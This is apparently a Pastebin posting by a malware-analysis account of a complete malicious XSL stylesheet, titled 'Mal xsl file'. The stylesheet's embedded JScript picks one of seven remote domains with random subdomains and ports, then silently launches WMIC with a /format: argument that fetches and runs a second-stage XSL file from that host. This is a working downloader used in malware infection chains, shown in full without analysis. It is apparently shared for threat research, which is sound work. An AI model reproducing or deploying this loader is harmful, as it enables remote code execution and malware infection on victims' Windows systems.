Advertisement
dissectmalware

Mal xsl file

Sep 18th, 2018
598
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
XML 1.83 KB | None | 0 0
  1. <?xml version='1.0'?>
  2. <stylesheet
  3. xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
  4. xmlns:user="placeholder"
  5. version="1.0">
  6. <output method="text"/>
  7.     <ms:script implements-prefix="user" language="JScript">
  8.     <![CDATA[
  9.        
  10. function radador(min, max)
  11. {
  12.  return Math.round(Math.random()*(max-min)+min)
  13. }
  14.     var xVRXastaroth;
  15.     var smaeVar;
  16.     var ss1;
  17.     var ss2;
  18.     var ss3;
  19.     var pingadori;
  20.     var ss4;
  21.     smaeVar = "09/";
  22.  
  23.     pingadori = radador(1,7);
  24.     if (pingadori == 1)
  25.     {
  26.     xVRXastaroth = "http://ewwtw"+radador(1111111,9999999)+".justcheuty.com:"+radador(25000,25099)+"/"+smaeVar+ "v131.xsl";
  27.     }
  28.     if (pingadori == 2)
  29.     {
  30.     xVRXastaroth = "http://exxxwrtw"+radador(1111111,9999999)+".kloudghtlp.com:"+radador(25000,25099)+"/"+smaeVar+ "v131.xsl";
  31.     }
  32.  
  33.     if (pingadori == 3)
  34.     {
  35.     xVRXastaroth = "http://ewyytrtw"+radador(1111111,9999999)+".justchotlo.com:"+radador(25000,25099)+"/"+smaeVar+ "v131.xsl";
  36.     }
  37.    
  38.     if (pingadori == 4)
  39.     {
  40.     xVRXastaroth = "http://ewyytrtw"+radador(1111111,9999999)+".justchtt.com:"+radador(25000,25099)+"/"+smaeVar+ "v131.xsl";
  41.     }
  42.    
  43.     if (pingadori == 5)
  44.     {
  45.     xVRXastaroth = "http://ewyytrtw"+radador(1111111,9999999)+".navegador04890.com:"+radador(25000,25099)+"/"+smaeVar+ "v131.xsl";
  46.     }
  47.    
  48.     if (pingadori == 6)
  49.     {
  50.     xVRXastaroth = "http://ewyytrtw"+radador(1111111,9999999)+".blackjoud.com:"+radador(25000,25099)+"/"+smaeVar+ "v131.xsl";
  51.     }
  52.    
  53.     if (pingadori == 7)
  54.     {
  55.     xVRXastaroth = "http://ewyytrtw"+radador(1111111,9999999)+".justchttb.com:"+radador(25000,25099)+"/"+smaeVar+ "v131.xsl";
  56.     }
  57.    
  58.    
  59.     var WSh = new ActiveXObject("WScript.Shell");
  60.     var ShA = new ActiveXObject("Shell.Application");
  61.     ShA.ShellExecute("C:\\Windows\\system32\\wbem\\WMIC.exe",' os get /format:"'+xVRXastaroth+'?'+radador(1111111,9999999)+'"', "", "open", 0);
  62.     ]]> </ms:script>
  63. </stylesheet>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement